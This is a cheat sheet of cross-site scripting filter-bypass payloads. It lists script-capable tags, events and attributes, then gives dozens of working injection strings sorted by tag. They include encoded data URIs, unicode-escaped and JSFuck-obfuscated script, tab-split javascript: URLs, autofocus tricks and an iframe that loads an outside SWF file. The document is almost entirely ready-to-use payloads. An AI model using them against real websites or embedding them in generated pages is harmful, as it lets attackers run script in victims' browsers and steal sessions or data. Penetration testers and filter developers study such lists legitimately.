Bypassing XSS filters
In the XSS world, there are many tags, events, attributes can be used to execute js.
- Tag can execute js
<script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input> <select> <textarea> <keygen> <frameset> <embed> <svg> <math> <video> <audio> -
The events are execute js:
onload onunload onchange onsubmit onreset onselect onblur onfocus onabort onkeydown onkeypress onkeyup onclick ondbclick onmouseover onmousemove onmouseout onmouseup onforminput onformchange ondrag ondrop
- Properties can execute
formaction action href xlink:href autofocus src content data
Bypassing
- Use any tag for bypassing harm tag blacklist
<M/onclick=”alert(1)”>M - use “/” instead of spaces
<img/src=x onerror=alert(1)> - use short xss payload
<b/ondrag=alert()>M - data URI
<a href=javascript:alert(2)>M
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==>
<a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M
<a href=javascript:alert(13)>M
<a href=javascript:confirm(2)>M - combination to xlink:href
<svg><a xlink:href=”javascript:alert(14)”><rect width=”1000″ height=”1000″ fill=”white”/></a></svg>
<math><a xlink:href=javascript:alert(1)>M - script tag
<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
<script firefox>alert(1)</script>
<script>~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script> //
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script>
<script>prompt(-[])</script>
<script>alert(String.fromCharCode(49))</script>
<script>alert(/7/.source)</script>
<script>setTimeout(‘alert(1)’,0)</script> - button tag & html5
<button/onclick=alert(1) >M</button>
<form><button formaction=javascript:alert(1)>M
<button onfocus=alert(1) autofocus> - <p> tag
<p/onmouseover=javascript:alert(1); >M</p> - <img> tag
<img src ?itworksonchrome?\/onerror = alert(1)>
<img src=x onerror=window.open(‘http://google.com’);>
<img/src/onerror=alert(1)>
<img src=”x:kcf” onerror=”alert(1)”> - <body> tag
<body onload=alert(1)>
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> - <var> tag
<var onmouseover=”prompt(1)”>KCF</var> - <div> tag
<div/onmouseover=’alert(1)’>X
<div style=”position:absolute;top:0;left:0;width:100%;height:100%” onclick=”alert(52)”> - <iframe> tag
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<iframe SRC=”http://0x.lv/xss.swf”></iframe>
<IFRAME SRC=”javascript:alert(1);”></IFRAME>
<iframe/onload=alert(53)></iframe> - <meta> tag
<meta http-equiv=”refresh” content=”0;javascript:alert(1)”/>?
<meta http-equiv=”refresh” content=”0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”> - <object> tag
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object> - <marquee> tag
<marquee onstart=”alert(‘sometext’)”></marquee> - <isindex> tag
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image> - <input> tag
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus> - <select> tag
<select onfocus=javascript:alert(1) autofocus> - <textarea> tag
<textarea onfocus=javascript:alert(1) autofocus> - <keygen> tag
<keygen onfocus=javascript:alert(1) autofocus> - <frameset> tag
<FRAMESET><FRAME SRC=”javascript:alert(1);”></FRAMESET>
<frameset onload=alert(1)> - <embed> tag
<embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=”></embed> //chrome
<embed src=javascript:alert(1)> //firefox - <svg> tag
<svg onload=”javascript:alert(1)” xmlns=”http://www.w3.org/2000/svg”></svg>
<svg xmlns=”http://www.w3.org/2000/svg”><g onload=”javascript:alert(1)”></g></svg> - <math> tag
<math href=”javascript:javascript:alert(1)”>CLICKME</math>
<math><y/xlink:href=javascript:alert(51)>test1
<math> <maction actiontype=”statusline#http://wangnima.com”
xlink:href=”javascript:alert(49)”>CLICKME</maction> </math> - <video> tag
<video><source onerror=”alert(1)”>
<video src=x onerror=alert(48)> - <audio> tag
<audio src=x onerror=alert(47)>